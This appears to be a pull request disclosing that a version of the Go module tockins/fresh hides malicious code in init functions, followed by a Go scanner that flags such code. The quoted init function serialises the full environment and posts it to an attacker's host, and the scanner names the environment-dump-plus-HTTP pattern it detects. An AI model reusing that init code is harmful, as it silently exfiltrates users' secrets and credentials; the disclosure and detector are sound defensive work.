
Replace malicious version of dep

machinly opened this issue 3 years ago • 0 comments

This PR replaces the malicious version of github.com/tockins/fresh.

The new version (v0.0.0-20220719194346-eee4eda4271e) of github.com/tockins/fresh has malicious code in the init func of every Go file, and you can't see this version on GitHub.

After `make build`, you can find it in ~/go/pkg/mod/github.com/tockins/fresh@v0.0.0-20220719194346-eee4eda4271e. The malicious code looks like this. It posts the env to a weird URL.

```go
// Import block reconstructed from the calls below (the PR quotes only the
// init func); the obfuscated aliases resolve to standard-library packages.
import (
	x0__ "os"
	x1__ "bytes"
	x2__ "net/http"
	x3__ "encoding/json"
)

func init() {
	// Run-once guard: the marker variable is set after the first exfiltration.
	if x0__.Getenv("e452d6ab") == "" {
		// Serialize the whole process environment (secrets, tokens, paths) as JSON.
		x4__, _ := x3__.Marshal(x0__.Environ())
		x0__.Setenv("e452d6ab", "1")
		// Ship it to the attacker's host, tagged with the hijacked org/repo.
		x2__.Post("http://ovz1.j19544519.pr46m.vps.myjino.ru:49460?org=tockins&repo=fresh", "application/json", x1__.NewBuffer(x4__))
	}
}
```

machinly · Aug 12 '22 12:08
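The pattern above (an `init` that dumps `os.Environ()` and posts it over HTTP through aliased imports) can be hunted for mechanically in a module cache before a build runs it. The following is an added example, not code from the PR or from the fresh project: it parses Go source with `go/ast`, resolves import aliases back to their package paths so names like `x2__` cannot hide `net/http`, and flags any `init` function that both reads the full environment and makes an outbound HTTP call. The two source strings are constructed here to mirror the snippet in the PR; the exfiltration URL is replaced with a placeholder host.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"strings"
)

// Constructed sample modelled on the init func quoted in the PR. The import
// block is an assumption (the PR shows only the function body), and the
// attacker host is replaced with example.invalid.
const sample = `package fresh

import (
	x0__ "os"
	x1__ "bytes"
	x2__ "net/http"
	x3__ "encoding/json"
)

func init() {
	if x0__.Getenv("e452d6ab") == "" {
		x4__, _ := x3__.Marshal(x0__.Environ())
		x0__.Setenv("e452d6ab", "1")
		x2__.Post("http://example.invalid/?org=tockins&repo=fresh", "application/json", x1__.NewBuffer(x4__))
	}
}
`

// Constructed benign control: reading a single variable in init is normal.
const benign = `package ok

import "os"

var debug bool

func init() {
	if os.Getenv("DEBUG") != "" {
		debug = true
	}
}
`

// Finding describes one init function that both dumps the environment and
// talks to the network.
type Finding struct {
	File  string
	Line  int
	Calls []string // calls resolved to package path, e.g. "net/http.Post"
}

// ScanSource parses one Go file and returns a Finding for every init func
// that calls os.Environ and a net/http request helper, whatever the imports
// were aliased to.
func ScanSource(filename, src string) ([]Finding, error) {
	fset := token.NewFileSet()
	f, err := parser.ParseFile(fset, filename, src, 0)
	if err != nil {
		return nil, err
	}
	// Local name (alias, or last path element) -> import path.
	aliases := map[string]string{}
	for _, imp := range f.Imports {
		path := strings.Trim(imp.Path.Value, `"`)
		name := path[strings.LastIndex(path, "/")+1:]
		if imp.Name != nil {
			name = imp.Name.Name
		}
		aliases[name] = path
	}
	var findings []Finding
	for _, decl := range f.Decls {
		fn, ok := decl.(*ast.FuncDecl)
		if !ok || fn.Name.Name != "init" || fn.Recv != nil || fn.Body == nil {
			continue
		}
		var calls []string
		dumpsEnv, sendsHTTP := false, false
		ast.Inspect(fn.Body, func(n ast.Node) bool {
			call, ok := n.(*ast.CallExpr)
			if !ok {
				return true
			}
			sel, ok := call.Fun.(*ast.SelectorExpr)
			if !ok {
				return true
			}
			ident, ok := sel.X.(*ast.Ident)
			if !ok {
				return true
			}
			path, known := aliases[ident.Name]
			if !known {
				return true // method call on a local value, not a package
			}
			full := path + "." + sel.Sel.Name
			calls = append(calls, full)
			switch full {
			case "os.Environ":
				dumpsEnv = true
			case "net/http.Post", "net/http.PostForm", "net/http.Get", "net/http.NewRequest":
				sendsHTTP = true
			}
			return true
		})
		if dumpsEnv && sendsHTTP {
			findings = append(findings, Finding{File: filename, Line: fset.Position(fn.Pos()).Line, Calls: calls})
		}
	}
	return findings, nil
}

func main() {
	for name, src := range map[string]string{"fresh.go": sample, "ok.go": benign} {
		fs, err := ScanSource(name, src)
		if err != nil {
			panic(err)
		}
		for _, f := range fs {
			fmt.Printf("%s:%d suspicious init: %s\n", f.File, f.Line, strings.Join(f.Calls, ", "))
		}
	}
}
```

Pointing this at `~/go/pkg/mod` (walking every `.go` file and calling `ScanSource` on each) catches this family regardless of the alias names chosen, because the check is on the resolved import path, not on the identifier. It will not catch a variant that builds the request through an interface value or a third-party HTTP client, so treat it as a cheap first pass, not as proof of cleanliness.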